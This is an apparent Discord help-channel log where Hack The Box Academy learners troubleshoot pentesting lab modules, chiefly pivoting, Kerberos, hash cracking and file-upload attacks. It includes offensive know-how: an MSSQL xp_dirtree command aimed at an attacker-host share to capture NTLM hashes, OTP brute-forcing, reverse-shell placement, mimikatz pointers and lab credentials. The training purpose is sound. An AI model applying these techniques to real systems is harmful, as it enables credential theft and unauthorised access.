#modules

:)

What? am I wrong?

yes but that's different from subdomain

not entirely

and i already do the ssh -D

bud, read the WHOLE section

Wait guys am I wrong?

it's impossible to differentiate a subdomain from a vhost by glancing at it, while used interchangeably colloquially they are different things

a single host can have the subdomains in different directories on the same host; thus single ip name based vhost

i already do but still can't figure it out

you don't go straight from the first machine to the last machine

there's a machine in the middle, this is the pivoting module yeah? where it describes using socks over rdp?

unless i'm reading wrong, bc you didn't provide the section name

gotcha, I chatgpted it as well for some extra context

(this is why it's important to provide the section name alongside the module, to prevent confusion from those that are attempting to help you)

owh my bad, im in ICMP Tunneling with SOCKS. and i try to connect with tdp but it can't connect. is the machine in the middle is the ip that the module give us? like 10.129.

because of the ptunnel-ng is doesn't run so i try to use other tools. but it still didn't run aswell

10.129 is the first machine

do me a favor when you connect to the first target: check the ip info

I am getting an SSL error when trying to browse into the hidden admin page? @fathom pendant

172.16.5.129

ah i was thinking you were on the next section which is a common section for people to get messed up on

http://sub.domain:port/page

not https

Oh my god that's what happens when you stay up until 5:44 am

ssl error when I'm trying to use http ... that's actually embarrassing

make sure you comment out the other socks config line

that tends to mess with it a fair bit

okay marcieleee

so this is the ip of the middle machine?

as you can see your proxychains is trying to use 127.0.0.1:1080 and because it's in strict mode, it's failing and not trying 9050

no; ignore what i said about middle machine

i was thinking you were on the next section

owh okay2

Appreciate the help 🙏 @fathom pendant
just got done with the module

so i need to nano and change the socks5 into 9050 right?

match the config that's given by the module, yes

and comment out the socks4 line

okay already

this is why i don't mess with proxychains stuff, too much headache

yap, before when i still in some module i can read so much documentation to learn about it. but when it comes to pivot, port forward, and tunnel. my head feels blow up

it's like a totally new field again for me, but it feels challenging

Anyone around to explain the question at the end of the Introduction to Malware Analysis - Debugging module (/module/227/section/2496)? I am unable to find the process for the notepad as it does not pop up on the list. Thanks in advance.

i still can't do the rdp and ssh -D 9050 into the server. is that anything that im wrong? @fathom pendant

no idea

chat with support

¯_(ツ)_/¯

T_T

i'm assuming you also did the ptunnel-ng steps

but thanks for the help marcielee

as those seem to be important for this

also try running proxychains with sudo

owhh icic

sometimes it's weird like that

okay2 i will reset my machine

thanks marcieleeeee

The sanitizers section of intro to binary fuzzing was fun. I wish it would have went over other sanitizers with examples as well rather than just address sanitizer though

Hey, I'm on the Hacking WordPress module.

At the Directory Indexing section.

I received a simple WordPress website, and was asked to manually enumerate the target for any directories whose contents can be listed, and locate a flag with the file name flag.txt.
Problem is I crawled every file in /wp-content/uploads/ and /wp-includes/ and the /wp-content/plugins/photo-gallery (a plugin that I found)
/wp-config.php returns a blank page

I can't find flag.txt.

Enumerate some more 🙂

What am I missing? I went over all of the files mentioned in the WordPress Structure section.

There’s more plugins

Are there..

You're right

Good luck 🤞

Got it, thank you @storm elk

You’re welcome. Have fun with the rest of the module 😎

Hey guys got a question about the footprinting module the DNS section

This is the question to the challenge
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I have found the domain for 203, but when I try to query for the SOA, it return nothing to me
I tried to query any and it only give me the A DNS records

What command did you use to query?

Wait I got the screenshot but can't send picture

Do I need to verify first to send pic?

Yes

Please read #welcome and #rules it will explain how to get verified

Identified, I blur the domain name just in case for spoiler

did you try to dig specifically for soa?

You mean dig SOA @$IP [domain_name]?

yes

Damn @foggy tusk your pfp making me hungry

lmao

Yeh done it return nothing as well, I'll send a pic

Haha, I saw it and took picture of it in a public place. The foods are fake btw. Hopefully no one dox me from a picture of chicken lol

Why are you trying to get the SOA?

Which group can connect to LINUX01? how can i find this i cant think of anything module = password attacks , section passthe ticket with linux

Because in my mind I thought it was asking me the DNS server for the said domain name

I just tried submitting the domain name and it is a correct answer, idk why

See that's in your mind

Yeah I just read the question again and I was like what is he talking about SOA for lol

So FQDN means the domain name itself?

Fully qualified domain name

I really need to reread the theory

Well I didn't do the module I just googled it

Okay, thank you for the answer I'll do more research again

of course

https://superuser.com/questions/1021869/using-sub-subdomains-with-bind

This might be interesting to read. Apparently there is only one SOA per zone, so that would imply that all the subdomains are managed by the same zone which challenged my understanding of dns

Thanks for the recommendation

I'm reading about it and trying my best to process the info rn, I have become the loading cat

have anyone noticed in the module = password attacks , section = pass the ticket with linux the ccache of julio is changing

only one of the ccache is valid

yeah i figured it out

but is there a script running to keep the ccache valid from time to tome

no; there's a script running that should generate a valid one

yeah same thing

no

but the date of creation of those files are same

you said from time to time

ok i am wrong you wins

since the targets aren't on 24/7; there isn't one

both ccache are generated at target spawn, but only one is actually valid

yeah

one is generated from a script that spawns one with a certain set of info, one that is generated from actually querying the DC

let me find that script i am root btw

https://stackoverflow.com/questions/32762773/use-php-exec-to-launch-a-linux-command-with-brace-expansion

I've come to share knowledge (no one asked for it, but incase someone is curious and sees my question in the future), it is because possibly

"the 'outer' shell you are implicitly using to call your shell script using shell_exec() is probably not Bash in your case. This way, brace expansion never takes place because there is no shell capable of expanding the expression before calling your program (as it would be in an interactive Bash session)."

That's why i wasn't able to recreate the bash shell even in a similar deb env.

you don't need to find the script

i wouldn't concern yourself too much with trying to figure it out

i am not hoping to ..

also try not to spoil module info

:))))))

yeah

(screenshots from the target about specific environment bits is spoiling)

don't be weird

gr8 i know you know more

careful in the future with sharing screenshots, one of your screenshots didn't have the fqdn redacted in it

i'm pointing out that the module is tier 1; and the rules of this channel specifically say don't spoil above tier 0

don't spoil modules above tier 0; command injections is tier 2

ok it will not happen again

ah okay, sorry about that. Was it the actual command itself or information in the module itself that was the issue? We can discuss via DM if need be to discuss. I wasn't trying to specifically share answers

alright noted

a bit of both; you mentioned the section specifically and provided a working solution.

ohhh I didn't see the channel title "but do not spoil module content over Tier 0" , is there a place to discuss Tier 2 or higher module content?

generally speaking, outright giving/providing a solution is spoiling as someone can just copy what you did without actually putting in the work themselves

no; as modules above tier 0 are paid content

the only light exception is #1234357888114364508 to post about issues

you can ask for helps and hints to nudge forward

but you can't share direct solutions or commands

it's why i do my best with my nudges to be general enough, but make sense in the context of doing the material

if a conversation about how to move forward with a t1+ module you're stuck on needs to happen, it can be taken to dms so as to 1: not flood and 2: not spoil since in DMs things can be a bit more direct

sounds good! I was just curious on why the command works in the module env and not in a normal deb env moreso and wanted to share exceptions in env! otherwise noted on everything mentioned, I'll try not to spoil in the future 👍🏾

if anyone is curious as to nudging instead of direct answering:
Nudging encourages the person asking the question to apply critical thinking; if i were to just tell you to do x instead of well what about <hint that makes 0 sense out of context> for instance with one of the modules one of the hints is 🤖 to encourage the person asking to consider one of the most common files on a web server: robots.txt

or sometimes engaging in the 'why' method, asking 'why' someone is doing something has them think and rationalize that either "i'm overcomplicating" or "i'm doing something wrong"

happens a lot where you're trying to overthink the problem; your first focus in any of the modules should be to follow the instructions (changing a thing here or there to get the flag) and then tinkering around with other potential methods

hi

Hello

When it comes to the Target(s) in the modules if the time runs out and I refresh the target, will any of the previous actions that I did to the previous target stay or be affected?

Like let's say I was using intruder to fuzz for something and the targets life limit expires.

you'd need to restart it

if it times out while using intruder (assuming you used intruder near the start of its lifetime) you're doing something wrong

Gotcha, thanks for the answer

I’m neweeeew

this isn't a gen chat; read and follow #welcome to access #general (as well as to see what this server is about)

In the CAPE training, Kerberos Attacks module, under Kerberoasting from Linux, when I run GetUserSPNs.py, I get an error - [-] [Errno 2] No such file or directory: 'DC01$.ccache'

Has anybody ever experienced this?

are there modules in the academy that can prepare me for HTB challenges?
It has many stuff like Crypto, Reverse, etc. but I'm not well taught in these stuff.

there's some binex stuff and some game reversing but as far as crypto there's nothing (at this moment) regarding that

can you recommend some resources that I can learn Crypto from?

google ¯_(ツ)_/¯

I am inputting the command exactly per the coursework.

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

i guess

otherwise i suggest resetting the target, changing vpn region, praying ¯_(ツ)_/¯

nevermind.... I still had KRB5CCNAME environment variable set from attacking a different box in the lab.

silly artifacts

Yet, another forehead slapper...

May I know that is it because of the location make the network so slow? cause I am stuck at the first pwnbox section

?

it helps to provide the module name and section name

the intro to academy page 4

which ask me to paste a command

page 4

that's not the section name

section name may be something like "interacting with targets"

you don't need to paste the command either

you can just type the command in

but if you're having issues pasting, there's a clipboard on the bottom right (if you fullscreen)

the section name is 'section', it is part of the intro to academy

ya that's what exactly I am doing now

otherwise you can just type in the pwnbox terminal cat /etc/issue

if you link your htb account via #welcome instructions you can paste screenshots

alright

if you're experiencing delays when typing in; you can change the pwnbox region, but i don't recommend that if you're a free user as you only get one spawn per day

Hello Confues in the ffuf skill assesment : Question 3

replace the given port with the word PORT

i'm assuming you already fuzzed and found what they asked for

Yas i found the /admin dir but there is the login page : try many things f=but there is no api key

then you are not in the skills assessment of the FFUF module

Hiii every one
Where can i find hint about Alert(Machine) Easy
Thks

read and follow #welcome and ask in #boxes

yeah that's a different assessment

send the link to the module

https://academy.hackthebox.com/module/144/section/1311

yeah that's information gathering: web edition

not the ffuf module (attacking web applications with ffuf)

in this case: robots are your friend, don't forget to put the discovered subdomain(s) in your hosts file

hi

Hello. Please read #welcome and #rules it will explain how to get verified

wait, you starting with the cape course from zero without cpts or other cert?

you don't need to have CPTS to start CAPE

if the ccache is updated does the old one expires

i know KVNO but i dont have info about KVNO of a keytab

may i know which module teach about mimikatz? thanks

there's a few that utilize mimikatz but none that strictly teach it

ok can point out which modules touch on mimikatz thanks

AD Enumeration and attacks, I think Password attacks for one of the things uh not sure, don't have my notes or anything off the top of my head

i know the t3+ AD modules utilize mimikatz a fair bit

ok no problem thanks for point it out hard to search on hackthebox site, this is really helpful enough

thanks

unless it's a module or section title the higher tier and/or newer modules that mention mimikatz take precedence

ya really hard to find

if really no other choice will google for it

well if you google and find any writeups that are for t1+ modules then those break ToS

ok thanks for the pointers

but tbh if you do the pentester path you're gonna run into mimikatz a bit

¯_(ツ)_/¯

if they do make a mimikatz dedicated module it'd likely be t2 at least

maybe t1

ya that is what having headache about there are some tools I have to know

the modules teaches you the info you need regarding mimikatz and what they want you to do

if you really wanna learn mimikatz just RTFM

i will be subscribing up to t3 cause some t1 and t2 doesn't have what I want to know, not that i am very good it is just need to cherry pick

https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/

mimikatz is just one of the must know tools I bump into understanding issue while attacking AD

ok thanks

cause when i use mimikatz to do part of the AD attack or enumeration i get the results butr seems like don't get certain part of it as in don't quite understand how i get the result

can't help ya there ¯_(ツ)_/¯

no problem i just sharing with you, this one i have ot read up on my own

generally the type::tool is self explanatory

mimikatz have 5 techniques of attacks i trying to see what it does

I recommend Password Attacks module, Windows Local Password Attacks section. It goes pretty in depth to dumping SAM, LSASS, NTDS, etc.

i’m brand new to cybersecurity and need help on htb. is there a step by step guide . i’m on a student account, do i need to up my account to get step by step guidance or is there anything like that on hack the box

ok sounds good, will definitely head over to have a look

Just start with the Tab= Starting point

Gives you

A guided mode

ok thank you

And also you can go with Academy htb also

starting point isn't recommended if someone doesn't know jack shit about linux

That true tho …

but they're referring specifically to being new on academy, referring to the student plan

I answered earlier but someone deleted it

hello

yea i’m on academy and i need step by step guidance. but can’t seem to locate it on there

for academy only the annual plans have step-by-step guides but you won't shouldn't find videos of modules above tier 0 as those are against ToS

watching someone else do something only goes so far; the benefit of academy is you being able to do it yourself

you can read and perform actions

I can't connect to RDP, does anyone know how to fix it?

i suggest the information security fundamentals course to get your bearings

thank you

but as far as that, no videos exist for academy content (aside from tier 0)

found it, looks relevant to me and useful thanks

The screen will go black, and then it will exit

the annual plan guides aren't really great for learning from either as they don't necessarily teach you anything

when the screen is black press enter

you don't need to blur the IP btw, no one can connect to the 10.129.x.x machines aside from you

Okay, thank you, but I still can't connect

aside from that i'd say tinker with different vpn regions or the classic just turn it off and turn it back on

ok I'll give it a try

can try the nearest location i know this is obvious in case you might miss this..

when you change vpn regions you'll need to respawn the pwnbox

and the other obvious don't run the vpn on your host machine while using pwnbox

just give it a few minutes

I am trying

as the AD enum labs are networked machines

you didn't blur the answer in that image

btw

ok Sufficient patience is required for debugging, thank you

time to get coffee

also i always suggest adding the /dynamic-resolution option to xfreerdp, so that you can resize the window

ok this is really cool

Can someone pls help me

i dont have the 'permissions' to text on the general chat

if #welcome only #welcome there #welcome was #welcome a #welcome channel #welcome to #welcome help #welcome with #welcome that #welcome

i dont have permission to send there either

Password Attacks - SA - Hard Lab

I managed to move the ||Backup.vhd|| file to an accessable directory by ||Johanna||, but mounting it requires Admin privileges. What am I missing here?

what do i do

brother read the channel

engage in critical thinking activities

Good morning all. I am trying to do the Knowledge Check for Getting Started Module. So far I was able to find credentials and get to the point where I need to add a php reverse shell to somewhere either in existing code or upload a new file.

Does anyone have a good article or piece of advice on where to place the rev shell in the code or if I am on the right track? Again, trying to do without a walk through, but I have been here for quite some time.

I have a listener setup, tun0, 9443, etc., but can't seem to curl and get anything to connect.

you don't need to mount it on the target

Sorry to interupt above convo.

there is no convo, don't apologize

this channel exists to help people with modules, you asking for help isn't interrupting anything

Got it.

also not much of a convo, more like a brick wall

i haven't touched this in a minute, this has ||themes|| enabled yeah?

Yes!

ty i got it

those use php 😉 and you don't need to bother with the <?php ?> syntax

just put the code into one of those, then go to the directory specified (it'll tell you where it updated iirc) and magic

Ohhhhhh... I had the bash one liner inside of it from previous.... I think I get it

What am I supposed to with it?

you can mount it somewhere else

i'll tell you this this is basically the last step

Got user! Thank you for the push I needed

I cannot grab a hash in CAPE - Kerberos module - Unconstrained User...

kbrelayx is receiving the hits and Printerbug seems to be working fine, but it's not writing hashes to the disk...

i cannot ping the dc with the config setup by chisel and proxychains first its very confusing and second i dont now how they both communicate with each other proxychains and chisel . i am on module password attacks and section pass the ticket with linux on optional que Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.

when i use the command proxychains python3 wmiexec -k dc01

and the dns 4.2.2.2 ????

can you ping dc from the pivot host?
because windows by default blocks ICMP echo requests so this might be the issue.
if you can, then the issue is with your pivoting setup.

yes

Try running proxychains with sudo

i did nmap scan

I believe the module as well talks about how to add a domain to the search/configuration in resolv.conf

they tell about /etc/host

Also, I'm assuming you put the dc01 in your hosts file?

yeah but not about resolv.conf i did add the entry of the ip of domain in there but no luck

You need to put DC01.inlanefreight.htb AND DC01

in hosts?

yes

Well the entry point isn't running the dns server

I forget i feel like there's one more you gotta add to that hosts line

yeah i have the entry just like in the module

perhaps you mean inlanefreight.htb

Probably?

Kerberos is quirky

nmap resolvs the ip to the domain by default and it is doing that so i think there is no problem in the /etc/hosts file

can you show your proxychains config file + your chisel setup?

ok

since you have socks5 in your proxychains config file, I think you need --socks5 in the reverse chisel server command.

ok i will try

happy lunar new year ^^

thanks i think the issue is resolved but got another one

Use the fqdn

Also try with psexec

why psexec worked

Different coding

@fathom pendant you have every answer

While they're similar in nature, they do functionally different things to achieve the shell

yeah agree

wmiexec uses windows management instrumentation, psexec uses process injection i believe

yeah via smb

IPC interprocesscommunication

iirc psexec creates a service

welp, I know that psexec works with SMB, but what does wmiexec work on?

wmi

windows management instrumentation

oh dur its right there in the screencap

They both utilize smb and ldap, just different method

are you sure?

yeah smb3

Look at the communication that occurs before failure

smb3 dialiect

Nothing to do with smb version

Ot at least that only plays a small portion

yeah

It communicates with 445 and 88, smb and ldap respectively at least iirc 88 is ldap

yeah i saw that 445

88 is Kerberos

Ah 88 is kerb auth

Been a minute

guess I'll need to have a little bit more exposure with impacket utilities lol, not just use the tools that always work for me.

Since a lot of this is interplay

psexec doesn't need Kerb auth

Hey guys, can I help you? 😄

works just fine on a regular Windows host

but if domain joined obv it will query the DC

hell i dont get it

wmiexec uses Win32_Procecss object in WMI for command execution (RPC over DCOM) and puts the output in a file. then it uses SMB to read output. in recent versions of wmiexec.py you can use -nooutput to disable smb (so you don't have access to output directly)

you can get a very high-level overview if you check the script on the impacket repo

The inner workings is more of an advanced understanding, i wouldn't worry about it

exactly, if you try to understand how windows works behind the scene, you'll have a headache that's never leaving lol.

You mean windows 11

ok lets move on

even 10, just look at how windows authenticates users.
It's just tons of DLLs and stuff loading behind the scenes.

https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access

this is for smbexec, similar to wmiexec

this is interesting, thanks for sharing.

what is happing today

whats the difference in dc01 and dc01.inlanefreight.htb

why it reached to winrm afterwards

fqdn, basically

some services only accept either IP or fqdn, and when interacting with kerberos; fqdn is preferred

but looking back over your screenshot it's also about hostname

the hostname of the DC isn't DC01.inlanefreight.htb it's just DC01

and you're interacting with the domain of inlanefreight.htb

i wonder if you can just do -i DC01.inlanefreight.htb and not worry about -r

yeah u are right but i am confused about having the same ip over these two names

virtual host thing is on web

because you're not dealing with things over the web (fully)

you're dealing with silly kerberos things

vhosts and stuff like that are exclusive web terminology

Hey there!, I'm really stuck on the module API Attacks in section Broken Authentication, I managed to get the account info but all options tu reset password are OTP needed, and I can't manage to get rid of that OTP because they are sent to the saved user email and phone number... any enlightment?, I've been trying for two days but my practice time ends and still have no Idea about how to solve this...

at first i think there was a problem on krb5.conf file then i enter the correct entry . but then i got frustrated over this que i am moving on

Have you tried to brute force it?

yes, I used ffuf following the example on the lecture, but there are no OTP wordlists locally and when I try to download an external wordlist seems the practice machine is nos allowed to download anything, tried by curl, and directly on the website that hosts the wordlist, but always responser with a connection error.

Try the seclists 4-digits-0000-9999.txt as a starting point for a wordlist.

I'll do that, thanks wish me luck 🙂

Np, if you are still stuck with it, you can DM.

Thank you I really apretiate

The name of the container is "Deleted Objects" not Tombstone

this should be corrected

tombstone is the state of the object

Hey guys, in the "Using Crackmapexec - MSSQL Enumeration and Attacks" we are told we can run commands using on the server via "-x" flag, during the exercise i notice it doesnt work and wonder if i need to enable xp_cmdshell first yet i didnt find any module/option to do so with nxc. After enabling xp_cmdshell with impackets mssqlclient.py, running commands with nxc was working.

Is there a way to enable xp_cmdshell with nxc? because it seems the module forgets to mention that

don't share answers to modules, if you feel it needs correction please post in #1234357888114364508 with the module and section name

Hi. I'm working on the File Upload Attacks module, in the section Limited File Uploads. After I'm trying to exploit the SVG file upload, it seems that I encountered the issue where the web app lost the upload button, which shows the SVG image is blank, as well as the source code. Is there something that I missed during the exploit?

i think there's a way to specify which execution mode to use undder

reset the target

looks better now?

Oh, i reset it a couple of times before and after this, i finally get what I expected. Thanks 🙏🙏

doesnt seem like it

and no module to do either

¯_(ツ)_/¯

can you not use smb to have it enable it?

er not smb

sql

idk, i figured the entire idea is to enable it through interaction with mssql

-q you can send a 'query' string

so maybe you can pass through the enable xp_cmdshell commands

https://www.netexec.wiki/mssql-protocol/mssql-command

just tried it again to make sure, didnt work for some reason, still its wierd nxc doesnt do it automatically if u use -x to run a local command, or atleast have an option to enable it

holy shit https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities just found out about using nxc modules to scan for vulns

like printnightmare and shit

Yeah it will identify a few of them. I love that tool.

CAPE module help.

Anyone finished this part from RBCD from linux

Compromise the domain without creating a machine account. Use DONE as the answer when finished.

u just need to use DONE no?

I know that, but that doesn’t help me ensure I know how to do it, if it’s on the exam

my bad, thought u were asking for the flag lmao

it's optional as in it's an additional way to do things

you'll likely be able to create a machine account (if it comes to it)

🤞🤞

imo finish the module then go back and do the optional bits

MacOS Fundamentals, no targets, and my workstation (pwnbox) is still parrot.os

Nice, I’m taking my time because I’m building obsidian templates for each section. It’s nice with the templates it auto fills all your findings.

that module requires you to have a macOS device

See I had a feeling that was the case but I didnt look at the overview just at the intro etc. Thank you

You beat me to it, again

Marcie is 🔥

Thanks BOTH o f you lol

question about HTF do i have to remember everything i read. or will it all connect at the end because i started Pen test path

I'd say you'll want to have a solid understanding of the material taught, yes. You'll need strong foundational knowledge to understand how the underlying systems are really working and apply what you learned to new situations that you haven't seen before based on that fundamental understanding and knowledge.

You should take notes

context and repetition

ok

stuff will start connecting the more you practice

Yeah but until it clicks, it saves the time of loading webpages if you already have notes of what to try

the knowledge needs to be relevant and applied to the specific situation

Pretty sure you can do that whole section without a pwnbox just need to read.

Good evening all

thats a cool kali, how did u get it to look like that?

Careful not to post spoilers for the module

I would recommend reading over the section again and make sure you're using the right commands

It really wasn’t a spoiler, since you can click done and what I was doing wasn’t working. It was also a direct copy paste from the module.

well yeah.. posting content from the module isn't allowed unless it's a tier 0 module

you can with spoiler tags though right?

no

This isnt me trying to argue, just ensuring that I understand correctly, but isn't the erratum section covered in screenshots of items not working correctly from modules, and for the past two years I have seen people that have trouble with syntax post screenshots or syntax snips from the modules of what did not work.

Anyone for a quick chat on the "Applications of AI in InfoSec" Module?

yeah erratum is an except because you have to tell them what's wrong for them to fix. the general rule of thumb is no posting content from anything above t0.. you can ask your question in such a way that doesn't reveal the contents of the module. that said, i did answer your question and tell you what you needed to do (you're not using the right command somewhere)

To answer your question, I use starship with zsh plugins. The terminal is windows terminal that I ssh into my kali box and I us ligolo from my windows machine to kali, so i can use tools like burp, firefox, rdp and etc to target machines on tun0. Just started with workflow last week, so we will see how well it works.

Here is a shot of the terminal since my last post was in violation and should have been posted, for those that are curious. I am more than happy to share dot files or help people establish a solid or riced out shell. My starship was taken from typcrafts dotfiles, but my color scheme for everything is dracula

There is a tutorial in Youtube for these changes

Working on Web Attacks: Chaining IDOR Vulnerabilities and I am working in the following question:
Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.
I changed the email but the flag isn't generating.

Thank u I use kali linux VM on virtual box

Thanks

you can still do it with only a linux vm

Yup I’m using VMware workstation for my Kali. I just SSH into it.

can anyone help me with “virtual hosts” in “information gathering-web edition” module

my gobuster is coming up empty every time

when i did the module it was using ffuf, did that change with the update of the module?

i’m using this command gobuster vhost -u http://94.237.59.180:40296 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -o vhosts.txt

yes , it’s gobuster now

looks to me the issue is related to your -u value, that should be a hostname not an ip address.

Can anyone assist me?

actually i could be wrong not sure i didn't do the updated module, but they give 2 commands one using the hostname instead

How do I start 🫡

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Guys, I need help, Because I am really stuck here. and don't know why it isn't working at the last point, I did everything the same what every showed on the modules, but still not working.

Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.

You need a --domain to append 😉

There's 3 total target systems for this section, if this is the double pivot with socks over rdp

yes this one, when I am trying to connect with rdp to 172.16.6.155, I changed the mode as well, it is showing that server is not avaialbe and check if it is running.

Can anyone help with Web Attacks: Chaining IDOR Vulnerabilities and I am working in the following question:
Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.
I changed the email but the flag isn't generating under the admin edit profile page.

Like I said 3 total machines, the 10.129.x.x target, the middle machine, 172.16.6.155

I am already in the middle machine and trying to enter 172.16.6.155 this one with tunnelling, but it is showing me error, like can't connect remote computer and showing 3 reason. if there any way to send screenshot, I wan to show you. Can you help me to figure it out ?

Make sure everything you do looks like what's done in the examples, same messages and all

If you wanna send images here read and follow #welcome

thank you 🥹

Is there a module speaking about CGI?

It's touched on in a couple modules but nothing in depth beyond "hey cgi bins can be vulnerable, try this"

I just want to learn about what CGI's are, and can't find good articles

https://www.reddit.com/r/explainlikeimfive/comments/473za7/eli5_cgibin/

CGI, not cgi-bin

Or is it the same?

If possible, can someone help me understand why I get varied results using SMTP-user-enum, I have the answer because I used Metasploit but I want to understand where I went wrong. (this is for the Pentest job role, footprinting, SMTP) The question wants me to find the username. With the default query timeout I dont get any responses, I increase it to 6, I get 6 usernames that exist, when i check these with VRFY none of them exist, If I increase to 7 for query timeout I got a lot more resullts, the correct ansnwer is in there but finding it would mean me taking most of the provided wordlist and using the VRFY command on each which kinda defeats the object of using the tool

thanks in advance

the more time you give it, the more the server can screw tihh you and provide you with false positives

VRFY can be unreliable, so you might have to use another technique to confirm these usernames

For the Attacking Common services modules in the FTP section is it normal that I get disconnected from the ftp port it closes ? I managed to get the files with the anonymous users but now I cant even reconnect to it ?? dunno if its a bug or the way its intended , cant even bruteforce the user and pass with hydra or netexec or medusa as i keep getting dc ? Dunno if im doing something wrong or its the intended way??

If that happens reset the target and wait a few minutes, and if the issue still persists then nothing much to do.

I tried that a couple of time xD I'll wait a hour or so before trying again then thanks for the tips

Thanks I also tried the RCPT but had the same problem, the default settings believe is 5 which returns no exists and then 6 gives false positives

I’ll have to do a bit of research on this tool

yes, please do a bit of research

Really nice Module! The Introduction one was heavy on theory, but this one was really nice!

https://academy.hackthebox.com/achievement/799850/292

hello, How do I access this IP from my virtual machine?

module: getting started

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

thankS!

Guys I have a question in the Skills Assment File Upload, when I got using burpsuite to intercept the request and see how the image was being sent, after fuzzing and knowing what extensions are allowed and so on, when I sent it to the intruder the image was uploaded but if I sent it manually from the Repeater, it kept telling me “Only images are allowed” but from the Intruder the image was uploaded, can anyone know why this is happening? Or is it a machine error?

sounds like there's some filter in place or you changed something which made it think it's not an image. try bypassing the filter.

Traducción
It is strange because the only thing I did was to send it from the repeater to the intruder and then fuzz the extensions, so the request was the same, nothing had changed

There is no "better." Infosec is as wide as it is deep, pick the niche you want to learn and go for that one.

yeah, cbbh

Linking on the website doesn't actually do anything (yet)

gotcha. odd but thanks

more odd that I can't message there and had to here since it's a bit off topic. Should have someone fix that lol

If you are looking for access to #general please verify by reading #rules and #welcome

lets keep this channel module related 🙂

Is this the first time doing that skills assessment?

tbf I did and it mentioned limited access to the server but why not the one channel to chat in the server about the site itself lmao. can't chat to ask questions if you don't have an account...

When you /verify it provides more access to the server

And yeah, it's an official server relating to a product/service, of course you need an account

But it's not like you need to pay for the account

Yes but that also requires an account. can't even come to ask questions about the service you might be interested in. Doesn't make much sense so.

https://tenor.com/view/it's-totally-free-grady-smith-it-is-entirely-free-it's-free-of-charge-gif-13058500461027536998

#welcome explains a lot, alongside visiting the website itself

Generally you can email about stuff like that. Most companies don't really porovide 24/7 support via their discord.

no but community members could

and they do here

#1024429874246590575 <-

Hi

anyways I don't want to just be ranting when I was just trying to inquire so I'll be on my way then since it's not welcomed.

You should be able to pose your question there

I have a small question regarding php

Since you're so adamant about not creating an account (which is 100% free to create)

echo gethostname(); // may output e.g,: sandie
?>
```  this command does get/executes the system to get hostname right?

gethostname() seems like a built in php function

Since it's not doing system (command)

ah I see, I needed to execute the hostname on one of the file upload attack module and it said to execute hostname. I searhced how to get hostname from php on google and this was one of the top results

when I uploaded this file it gave some error

https://www.php.net/manual/en/function.gethostname.php

That's just one way to do it

More than one way to perform desired actions

ahh if its a way is there a reason it doesn't work? Im tryna try and experiment with different ways to help with understanding and familiarity

So I just did the Footprinting Lab - Medium and I have a question, trying to understand some things. Anyone up for a chat ?

yup thats literally where i got the above code from

Anyone else having issue with Attacking Common Services - FTP/SMB machine ?? Ports for the service works and after a few minute they not working anymore I restarted the machine a few time and sometime it work 1 time sometime 2 times but most of the time it dont even work on machine spawn

not sure but as i said there may be other ways to get your desired result

okay appreciate it

could be a config that disallows that function

ahh I see, weird lol

not that weird

it did say it wasnt validating the file uploads 🤔

if you were running a php server you'd wanna mitigate attacks no?

¯_(ツ)_/¯

i mean in the example it allowed us to upload a file that executed "hello world" from php 😅 and I think it said it didnt have sanitization

Sure

doesn't mean there can't be stuff that prevents execution

also did you try without the echo?

nah didnt try without the echo, otherwise it wouldnt display it on the web page ? 🤔

ok seem there was apparently an error with what I was doing or the website, well I refreshed the target and it worked now 🙂

https://tenor.com/view/poop-running-it-happens-forrest-gump-gif-11089414

As I was very weak in this part I decided to review it to understand well all the contents of file upload and the truth is that I don't remember the first time I did it, but it is the first time that this topic happens to me.

If you are still working on it I don't mind checking out your requests and responses.

Sure, give me a moment and I'll go back to the skills assessment and send it to you

Someone can give me tips for the Attacking commons service SQL part?

I connected to the mssql server using impacket-mssqlclient

afterward I run responder on my attack host

execute this command on the mssql server : EXEC master..xp_dirtree '\10.10.17.28\share\

Receive an NTLM hash on the attack host

But tried to crack it with the ressource wordlist and the one found into the ftp/smb server but no hits

am I missing something?

Did you copy the whole hash?

Wait you did crack it?

no it cant crack it

If you couldn't crack it, and you're sure you provided the correct hashcat mode, then make sure that you copied the whole hash, and that the hash in the file is written on one line without line breaks.

Did you use 5600?

I used 1000

is 5600 the right for ntml?

That’s ntlm not ntlmV2

Yes use 5600

oh right

that might be it

Right I thinks thats it -> 5600 NetNTLMv2

It worked thanks

How do you guys know what hash type to use is there a way to dectect or a program to autodetec hash ?

I usually run hashcat --identify file.txt on the file, this sometimes gives direct answer, and other times it gives possible modes, if so i usually try what seems right to me or try them all lol.

Very nice thanks ill add this to my notes

I need to reach an admin please?

Web Attacks Skills Assessment I am stuck on changing the admin password. I've tried using ||uid + token + new password on reset.php|| but to no avail. Any guidance?

Can anyone provide assistance?

Try with || verb tampering ||

I am in the HTB academy path and in the Working with Files and Directories module. Why do I keep getting command not found when the command ls does work and when I pull up the manual page, it shows the flags I can use

I am trying to get the inode for it

-i is the command for inode but it isn't working

is the flag for ls

I didn't misspell it

shadow.bak, not shadow.bk

.

that's what I did, shadow.bak

without the pipe?

ohhhhhh, ok

I will try that

You're right, I did it without the pipe and it worked

And you are right, shadow.bak is not a command, lol

I should have been using grep shadow.bak if I was going to use the pipe

all the little stuff to remember, it can be exhausting at times lol

True. I am in the learning phase for the basics. I am still very new to thsi.

this

I am going to try that right now

how do I exit out of this

exit worked

I think it might have been but I am not sure

I just tried what you suggested and it didn't work

but this worked, I get what you mean now

LOL, oh man! The little things are going to kill me

At least I am a little older and wiser so I won't want to throw my computer out the door, 🤣

When I get frustrated that is

Well I can't afford a new one every week, 🤣
I have calmed down as I've gotten older, thank God. I can just walk away from the computer now and get a little exercise to calm down.

Try asking in #boxes

